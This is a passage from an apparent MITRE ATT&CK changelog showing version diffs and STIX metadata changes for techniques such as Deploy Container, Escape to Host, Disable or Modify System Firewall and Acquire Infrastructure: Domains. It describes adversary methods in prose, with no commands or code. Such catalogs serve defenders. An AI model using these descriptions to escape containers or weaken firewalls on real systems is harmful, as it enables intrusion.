> that execute or download malware. In others, an adversary m> that execute or download malware. In others, an adversary m
>ay deploy a new container configured without network rules, >ay deploy a new container configured without network rules, 
>user limitations, etc. to bypass existing defenses within th>user limitations, etc. to bypass existing defenses within th
>e environment.  Containers can be deployed by various means,>e environment. In Kubernetes environments, an adversary may 
> such as via Docker's <code>create</code> and <code>start</c>attempt to deploy a privileged or vulnerable container into 
>ode> APIs or via a web application such as the Kubernetes da>a specific node in order to [Escape to Host](https://attack.
>shboard or Kubeflow.(Citation: Docker Containers API)(Citati>mitre.org/techniques/T1611) and access other containers runn
>on: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) Adve>ing on the node. (Citation: AppSecco Kubernetes Namespace Br
>rsaries may deploy containers based on retrieved or built ma>eakout 2020)  Containers can be deployed by various means, s
>licious images or from benign images that download and execu>uch as via Docker's <code>create</code> and <code>start</cod
>te malicious payloads at runtime.(Citation: Aqua Build Image>e> APIs or via a web application such as the Kubernetes dash
>s on Hosts)>board or Kubeflow. (Citation: Docker Containers API)(Citatio
 >n: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) In Ku
 >bernetes environments, containers may be deployed through wo
 >rkloads such as ReplicaSets or DaemonSets, which can allow c
 >ontainers to be deployed across multiple nodes.(Citation: Ku
 >bernetes Workload Management) Adversaries may deploy contain
 >ers based on retrieved or built malicious images or from ben
 >ign images that download and execute malicious payloads at r
 >untime.(Citation: Aqua Build Images on Hosts)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-15 16:13:40.232000+00:002024-04-11 21:24:42.680000+00:00
descriptionAdversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. Containers can be deployed by various means, such as via Docker's create and start APIs or via a web application such as the Kubernetes dashboard or Kubeflow.(Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020) Containers can be deployed by various means, such as via Docker's create and start APIs or via a web application such as the Kubernetes dashboard or Kubeflow. (Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) In Kubernetes environments, containers may be deployed through workloads such as ReplicaSets or DaemonSets, which can allow containers to be deployed across multiple nodes.(Citation: Kubernetes Workload Management) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'AppSecco Kubernetes Namespace Breakout 2020', 'description': 'Abhisek Datta. (2020, March 18). Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1. Retrieved January 16, 2024.', 'url': 'https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216'}
external_references{'source_name': 'Kubernetes Workload Management', 'description': 'Kubernetes. (n.d.). Workload Management. Retrieved March 28, 2024.', 'url': 'https://kubernetes.io/docs/concepts/workloads/controllers/'}
x_mitre_contributorsJoas Antonio dos Santos, @C0d3Cr4zy

[T1006] Direct Volume Access

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-01 14:19:18.804000+00:002024-04-16 12:25:24.480000+00:00
x_mitre_version2.12.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsNetwork

[T1562.004] Impair Defenses: Disable or Modify System Firewall

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may disable or modify system firewalls in order t1Adversaries may disable or modify system firewalls in order 
>to bypass controls limiting network usage. Changes could be >to bypass controls limiting network usage. Changes could be 
>disabling the entire mechanism as well as adding, deleting, >disabling the entire mechanism as well as adding, deleting, 
>or modifying particular rules. This can be done numerous way>or modifying particular rules. This can be done numerous way
>s depending on the operating system, including via command-l>s depending on the operating system, including via command-l
>ine, editing Windows Registry keys, and Windows Control Pane>ine, editing Windows Registry keys, and Windows Control Pane
>l.  Modifying or disabling a system firewall may enable adve>l.  Modifying or disabling a system firewall may enable adve
>rsary C2 communications, lateral movement, and/or data exfil>rsary C2 communications, lateral movement, and/or data exfil
>tration that would otherwise not be allowed. For example, ad>tration that would otherwise not be allowed. For example, ad
>versaries may add a new firewall rule for a well-known proto>versaries may add a new firewall rule for a well-known proto
>col (such as RDP) using a non-traditional and potentially le>col (such as RDP) using a non-traditional and potentially le
>ss securitized port (i.e. [Non-Standard Port](https://attack>ss securitized port (i.e. [Non-Standard Port](https://attack
>.mitre.org/techniques/T1571)).(Citation: change_rdp_port_con>.mitre.org/techniques/T1571)).(Citation: change_rdp_port_con
>ti)>ti)  Adversaries may also modify host networking settings th
 >at indirectly manipulate system firewalls, such as interface
 > bandwidth or network connection request thresholds.(Citatio
 >n: Huntress BlackCat) Settings related to enabling abuse of 
 >various [Remote Services](https://attack.mitre.org/technique
 >s/T1021) may also indirectly modify firewall rules.
Details
values_changed
STIX FieldOld valueNew Value
modified2023-02-28 22:34:38.316000+00:002024-03-28 00:01:08.337000+00:00
descriptionAdversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel. Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti)Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel. Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti) Adversaries may also modify host networking settings that indirectly manipulate system firewalls, such as interface bandwidth or network connection request thresholds.(Citation: Huntress BlackCat) Settings related to enabling abuse of various [Remote Services](https://attack.mitre.org/techniques/T1021) may also indirectly modify firewall rules.
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Huntress BlackCat', 'description': 'Carvey, H. (2024, February 28). BlackCat Ransomware Affiliate TTPs. Retrieved March 27, 2024.', 'url': 'https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps'}
x_mitre_platformsNetwork

[T1561.001] Disk Wipe: Disk Content Wipe

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-12 23:42:59.868000+00:002024-04-16 13:00:33.303000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsNetwork

[T1583.001] Acquire Infrastructure: Domains

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may acquire domains that can be used during targt1Adversaries may acquire domains that can be used during targ
>eting. Domain names are the human readable names used to rep>eting. Domain names are the human readable names used to rep
>resent one or more IP addresses. They can be purchased or, i>resent one or more IP addresses. They can be purchased or, i
>n some cases, acquired for free.  Adversaries may use acquir>n some cases, acquired for free.  Adversaries may use acquir
>ed domains for a variety of purposes, including for [Phishin>ed domains for a variety of purposes, including for [Phishin
>g](https://attack.mitre.org/techniques/T1566), [Drive-by Com>g](https://attack.mitre.org/techniques/T1566), [Drive-by Com
>promise](https://attack.mitre.org/techniques/T1189), and Com>promise](https://attack.mitre.org/techniques/T1189), and Com
>mand and Control.(Citation: CISA MSS Sep 2020) Adversaries m>mand and Control.(Citation: CISA MSS Sep 2020) Adversaries m
>ay choose domains that are similar to legitimate domains, in>ay choose domains that are similar to legitimate domains, in
>cluding through use of homoglyphs or use of a different top->cluding through use of homoglyphs or use of a different top-
>level domain (TLD).(Citation: FireEye APT28)(Citation: Paypa>level domain (TLD).(Citation: FireEye APT28)(Citation: Paypa
>lScam) Typosquatting may be used to aid in delivery of paylo>lScam) Typosquatting may be used to aid in delivery of paylo
>ads via [Drive-by Compromise](https://attack.mitre.org/techn>ads via [Drive-by Compromise](https://attack.mitre.org/techn
>iques/T1189). Adversaries may also use internationalized dom>iques/T1189). Adversaries may also use internationalized dom
>ain names (IDNs) and different character sets (e.g. Cyrillic>ain names (IDNs) and different character sets (e.g. Cyrillic
>, Greek, etc.) to execute "IDN homograph attacks," creating >, Greek, etc.) to execute "IDN homograph attacks," creating 
>visually similar lookalike domains used to deliver malware t>visually similar lookalike domains used to deliver malware t
>o victim machines.(Citation: CISA IDN ST05-016)(Citation: tt>o victim machines.(Citation: CISA IDN ST05-016)(Citation: tt
>_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: ht>_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: ht
>track_unhcr)(Citation: lazgroup_idn_phishing)  Adversaries m>track_unhcr)(Citation: lazgroup_idn_phishing) Different URIs
>ay also acquire and repurpose expired domains, which may be >/URLs may also be dynamically generated to uniquely serve ma
>potentially already allowlisted/trusted by defenders based o>licious content to victims.(Citation: iOS URL Scheme)(Citati
>n an existing reputation/history.(Citation: Categorisation_n>on: URI)(Citation: URI Use)(Citation: URI Unique)  Adversari
>ot_boundary)(Citation: Domain_Steal_CC)(Citation: Redirector>es may also acquire and repurpose expired domains, which may
>s_Domain_Fronting)(Citation: bypass_webproxy_filtering)  Dom> be potentially already allowlisted/trusted by defenders bas
>ain registrars each maintain a publicly viewable database th>ed on an existing reputation/history.(Citation: Categorisati
>at displays contact information for every registered domain.>on_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redire
> Private WHOIS services display alternative information, suc>ctors_Domain_Fronting)(Citation: bypass_webproxy_filtering) 
>h as their own company data, rather than the owner of the do> Domain registrars each maintain a publicly viewable databas
>main. Adversaries may use such private WHOIS services to obs>e that displays contact information for every registered dom
>cure information about who owns a purchased domain. Adversar>ain. Private WHOIS services display alternative information,
>ies may further interrupt efforts to track their infrastruct> such as their own company data, rather than the owner of th
>ure by using varied registration information and purchasing >e domain. Adversaries may use such private WHOIS services to
>domains with different domain registrars.(Citation: Mandiant> obscure information about who owns a purchased domain. Adve
> APT1)>rsaries may further interrupt efforts to track their infrast
 >ructure by using varied registration information and purchas
 >ing domains with different domain registrars.(Citation: Mand
 >iant APT1)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-30 21:01:37.379000+00:002024-04-13 14:03:04.511000+00:00
descriptionAdversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering) Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering) Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'URI Unique', 'description': 'Australian Cyber Security Centre. National Security Agency. (2020, April 21). Detect and Prevent Web Shell Malware. Retrieved February 9, 2024.', 'url': 'https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF'}
external_references{'source_name': 'URI', 'description': 'Michael Cobb. (2007, October 11). Preparing for uniform resource identifier (URI) exploits. Retrieved February 9, 2024.', 'url': 'https://www.techtarget.com/searchsecurity/tip/Preparing-for-uniform-resource-identifier-URI-exploits'}
external_references{'source_name': 'URI Use', 'description': 'Nathan McFeters. Billy Kim Rios. Rob Carter.. (2008). URI Use and Abuse. Retrieved February 9, 2024.', 'url': 'https://www.blackhat.com/presentations/bh-dc-08/McFeters-Rios-Carter/Presentation/bh-dc-08-mcfeters-rios-carter.pdf'}
external_references{'source_name': 'iOS URL Scheme', 'description': 'Ostorlab. (n.d.). iOS URL Scheme Hijacking. Retrieved February 9, 2024.', 'url': 'https://docs.ostorlab.co/kb/IPA_URL_SCHEME_HIJACKING/index.html'}
x_mitre_contributorsNikola Kovac

[T1585.002] Establish Accounts: Email Accounts

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may create email accounts that can be used durint1Adversaries may create email accounts that can be used durin
>g targeting. Adversaries can use accounts created with email>g targeting. Adversaries can use accounts created with email
> providers to further their operations, such as leveraging t> providers to further their operations, such as leveraging t
>hem to conduct [Phishing for Information](https://attack.mit>hem to conduct [Phishing for Information](https://attack.mit
>re.org/techniques/T1598) or [Phishing](https://attack.mitre.>re.org/techniques/T1598) or [Phishing](https://attack.mitre.
>org/techniques/T1566).(Citation: Mandiant APT1) Adversaries >org/techniques/T1566).(Citation: Mandiant APT1) Establishing
>may also take steps to cultivate a persona around the email > email accounts may also allow adversaries to abuse free ser
>account, such as through use of [Social Media Accounts](http>vices – such as trial periods – to [Acquire Infrastructure](
>s://attack.mitre.org/techniques/T1585/001), to increase the >https://attack.mitre.org/techniques/T1583) for follow-on pur
>chance of success of follow-on behaviors. Created email acco>poses.(Citation: Free Trial PurpleUrchin)  Adversaries may a
>unts can also be used in the acquisition of infrastructure (>lso take steps to cultivate a persona around the email accou
>ex: [Domains](https://attack.mitre.org/techniques/T1583/001)>nt, such as through use of [Social Media Accounts](https://a
>).(Citation: Mandiant APT1)  To decrease the chance of physi>ttack.mitre.org/techniques/T1585/001), to increase the chanc
>cally tying back operations to themselves, adversaries may m>e of success of follow-on behaviors. Created email accounts 
>ake use of disposable email services.(Citation: Trend Micro >can also be used in the acquisition of infrastructure (ex: [
>R980 2016)>Domains](https://attack.mitre.org/techniques/T1583/001)).(Ci
 >tation: Mandiant APT1)  To decrease the chance of physically
 > tying back operations to themselves, adversaries may make u
 >se of disposable email services.(Citation: Trend Micro R980 
 >2016) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:09:59.862000+00:002024-02-28 21:11:27.088000+00:00
descriptionAdversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1) To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016)Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Establishing email accounts may also allow adversaries to abuse free services – such as trial periods – to [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) for follow-on purposes.(Citation: Free Trial PurpleUrchin) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1) To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016)
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Free Trial PurpleUrchin', 'description': 'Gamazo, William. Quist, Nathaniel.. (2023, January 5). PurpleUrchin Bypasses CAPTCHA and Steals Cloud Platform Resources. Retrieved February 28, 2024.', 'url': 'https://unit42.paloaltonetworks.com/purpleurchin-steals-cloud-resources/'}

[T1573] Encrypted Channel

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may employ a known encryption algorithm to concet1Adversaries may employ an encryption algorithm to conceal co
>al command and control traffic rather than relying on any in>mmand and control traffic rather than relying on any inheren
>herent protections provided by a communication protocol. Des>t protections provided by a communication protocol. Despite 
>pite the use of a secure algorithm, these implementations ma>the use of a secure algorithm, these implementations may be 
>y be vulnerable to reverse engineering if secret keys are en>vulnerable to reverse engineering if secret keys are encoded
>coded and/or generated within malware samples/configuration > and/or generated within malware samples/configuration files
>files.>.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-04-20 19:27:46.650000+00:002024-04-16 12:29:47.903000+00:00
descriptionAdversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.Adversaries may employ an encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsNetwork

[T1611] Escape to Host

Current version: 1.5

Version changed from: 1.4 → 1.5


Old Description
New Description
t1Adversaries may break out of a container to gain access to tt1Adversaries may break out of a container to gain access to t
>he underlying host. This can allow an adversary access to ot>he underlying host. This can allow an adversary access to ot
>her containerized resources from the host level or to the ho>her containerized resources from the host level or to the ho
>st itself. In principle, containerized resources should prov>st itself. In principle, containerized resources should prov
>ide a clear separation of application functionality and be i>ide a clear separation of application functionality and be i
>solated from the host environment.(Citation: Docker Overview>solated from the host environment.(Citation: Docker Overview
>)  There are multiple ways an adversary may escape to a host>)  There are multiple ways an adversary may escape to a host
> environment. Examples include creating a container configur> environment. Examples include creating a container configur
>ed to mount the host’s filesystem using the bind parameter, >ed to mount the host’s filesystem using the bind parameter, 
>which allows the adversary to drop payloads and execute cont>which allows the adversary to drop payloads and execute cont
>rol utilities such as cron on the host; utilizing a privileg>rol utilities such as cron on the host; utilizing a privileg
>ed container to run commands or load a malicious kernel modu>ed container to run commands or load a malicious kernel modu
>le on the underlying host; or abusing system calls such as `>le on the underlying host; or abusing system calls such as `
>unshare` and `keyctl` to escalate privileges and steal secre>unshare` and `keyctl` to escalate privileges and steal secre
>ts.(Citation: Docker Bind Mounts)(Citation: Trend Micro Priv>ts.(Citation: Docker Bind Mounts)(Citation: Trend Micro Priv
>ileged Container)(Citation: Intezer Doki July 20)(Citation: >ileged Container)(Citation: Intezer Doki July 20)(Citation: 
>Container Escape)(Citation: Crowdstrike Kubernetes Container>Container Escape)(Citation: Crowdstrike Kubernetes Container
> Escape)(Citation: Keyctl-unmask)  Additionally, an adversar> Escape)(Citation: Keyctl-unmask)  Additionally, an adversar
>y may be able to exploit a compromised container with a moun>y may be able to exploit a compromised container with a moun
>ted container management socket, such as `docker.sock`, to b>ted container management socket, such as `docker.sock`, to b
>reak out of the container via a [Container Administration Co>reak out of the container via a [Container Administration Co
>mmand](https://attack.mitre.org/techniques/T1609).(Citation:>mmand](https://attack.mitre.org/techniques/T1609).(Citation:
> Container Escape) Adversaries may also escape via [Exploita> Container Escape) Adversaries may also escape via [Exploita
>tion for Privilege Escalation](https://attack.mitre.org/tech>tion for Privilege Escalation](https://attack.mitre.org/tech
>niques/T1068), such as exploiting vulnerabilities in global >niques/T1068), such as exploiting vulnerabilities in global 
>symbolic links in order to access the root directory of a ho>symbolic links in order to access the root directory of a ho
>st machine.(Citation: Windows Server Containers Are Open)  G>st machine.(Citation: Windows Server Containers Are Open)  G
>aining access to the host may provide the adversary with the>aining access to the host may provide the adversary with the
> opportunity to achieve follow-on objectives, such as establ> opportunity to achieve follow-on objectives, such as establ
>ishing persistence, moving laterally within the environment,>ishing persistence, moving laterally within the environment,
> or setting up a command and control channel on the host.> accessing other containers running on the host, or setting 
 >up a command and control channel on the host.
Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-15 16:21:04.265000+00:002024-04-19 12:42:18.632000+00:00
descriptionAdversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview) There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask) Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://attack.mitre.org/techniques/T1609).(Citation: Container Escape) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open) Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview) There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask) Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://attack.mitre.org/techniques/T1609).(Citation: Container Escape) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open) Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, accessing other containers running on the host, or setting up a command and control channel on the host.
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.41.5
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsJoas Antonio dos Santos, @C0d3Cr4zy
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_contributorsJoas Antonio dos Santos, @C0d3Cr4zy, Inmetrics

[T1585] Establish Accounts

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may create and cultivate accounts with services t1Adversaries may create and cultivate accounts with services 
>that can be used during targeting. Adversaries can create ac>that can be used during targeting. Adversaries can create ac
>counts that can be used to build a persona to further operat>counts that can be used to build a persona to further operat
>ions. Persona development consists of the development of pub>ions. Persona development consists of the development of pub
>lic information, presence, history and appropriate affiliati>lic information, presence, history and appropriate affiliati
>ons. This development could be applied to social media, webs>ons. This development could be applied to social media, webs
>ite, or other publicly available information that could be r>ite, or other publicly available information that could be r
>eferenced and scrutinized for legitimacy over the course of >eferenced and scrutinized for legitimacy over the course of 
>an operation using that persona or identity.(Citation: NEWSC>an operation using that persona or identity.(Citation: NEWSC
>ASTER2014)(Citation: BlackHatRobinSage)  For operations inco>ASTER2014)(Citation: BlackHatRobinSage)  For operations inco
>rporating social engineering, the utilization of an online p>rporating social engineering, the utilization of an online p
>ersona may be important. These personas may be fictitious or>ersona may be important. These personas may be fictitious or
> impersonate real people. The persona may exist on a single > impersonate real people. The persona may exist on a single 
>site or across multiple sites (ex: Facebook, LinkedIn, Twitt>site or across multiple sites (ex: Facebook, LinkedIn, Twitt
>er, Google, GitHub, Docker Hub, etc.). Establishing a person>er, Google, GitHub, Docker Hub, etc.). Establishing a person
>a may require development of additional documentation to mak>a may require development of additional documentation to mak
>e them seem real. This could include filling out profile inf>e them seem real. This could include filling out profile inf
>ormation, developing social networks, or incorporating photo>ormation, developing social networks, or incorporating photo
>s.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)  E>s.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)  E
>stablishing accounts can also include the creation of accoun>stablishing accounts can also include the creation of accoun
>ts with email providers, which may be directly leveraged for>ts with email providers, which may be directly leveraged for
> [Phishing for Information](https://attack.mitre.org/techniq> [Phishing for Information](https://attack.mitre.org/techniq
>ues/T1598) or [Phishing](https://attack.mitre.org/techniques>ues/T1598) or [Phishing](https://attack.mitre.org/techniques
>/T1566).(Citation: Mandiant APT1)>/T1566).(Citation: Mandiant APT1) In addition, establishing 
 >accounts may allow adversaries to abuse free services, such 
 >as registering for trial periods to [Acquire Infrastructure]
 >(https://attack.mitre.org/techniques/T1583) for malicious pu
 >rposes.(Citation: Free Trial PurpleUrchin) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-16 17:35:59.386000+00:002024-02-28 21:08:56.520000+00:00
descriptionAdversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for 